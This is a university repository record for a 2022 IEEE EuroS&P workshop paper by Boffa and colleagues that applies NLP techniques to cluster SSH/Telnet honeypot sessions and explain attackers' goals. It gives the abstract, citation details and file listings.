Towards NLP-based Processing of Honeypot Logs

Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied

doi:10.1109/EuroSPW55150.2022.00038

Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.

Towards NLP-based Processing of Honeypot Logs / Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied. - STAMPA. - (2022), pp. 314-321. ( 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW) Genoa, Italy 06-10 June 2022) [10.1109/EuroSPW55150.2022.00038].

Towards NLP-based Processing of Honeypot Logs

Boffa, Matteo;Milan, Giulia;Vassio, Luca;Drago, Idilio;Mellia, Marco;Ben Houidi, Zied

2022

Abstract

Scheda breve

Scheda completa

Scheda completa (DC)

	Anno del prodotto
	
				2022
			
	Codice ISBN
	
				978-1-6654-9560-8
			
	Appare nelle tipologie
	
				4.1 Contributo in Atti di convegno

File in questo prodotto:

File	Dimensione	Formato
Article_IEEE.pdf accesso riservato Descrizione: IEEE Explorer Version Tipologia: 2a Post-print versione editoriale / Version of Record Licenza: Non Pubblico - Accesso privato/ristretto Dimensione 774.13 kB Formato Adobe PDF Visualizza/Apri Richiedi una copia	774.13 kB	Adobe PDF	Visualizza/Apri Richiedi una copia
Workshop_WTMC.pdf accesso aperto Descrizione: Accepted Manuscript Tipologia: 2. Post-print / Author's Accepted Manuscript Licenza: Pubblico - Tutti i diritti riservati Dimensione 742.69 kB Formato Adobe PDF Visualizza/Apri	742.69 kB	Adobe PDF	Visualizza/Apri

Pubblicazioni consigliate

I documenti in IRIS sono protetti da copyright e tutti i diritti sono riservati, salvo diversa indicazione.

Utilizza questo identificativo per citare o creare un link a questo documento: https://hdl.handle.net/11583/2969416

PORTO @ Archivio Istituzionale della Ricerca

Towards NLP-based Processing of Honeypot Logs

Boffa, Matteo;Milan, Giulia;Vassio, Luca;Drago, Idilio;Mellia, Marco;Ben Houidi, Zied

2022

Abstract

Scheda breve Scheda completa Scheda completa (DC)

Pubblicazioni consigliate

Informazioni

Conferma cancellazione

Scheda breve

Scheda completa

Scheda completa (DC)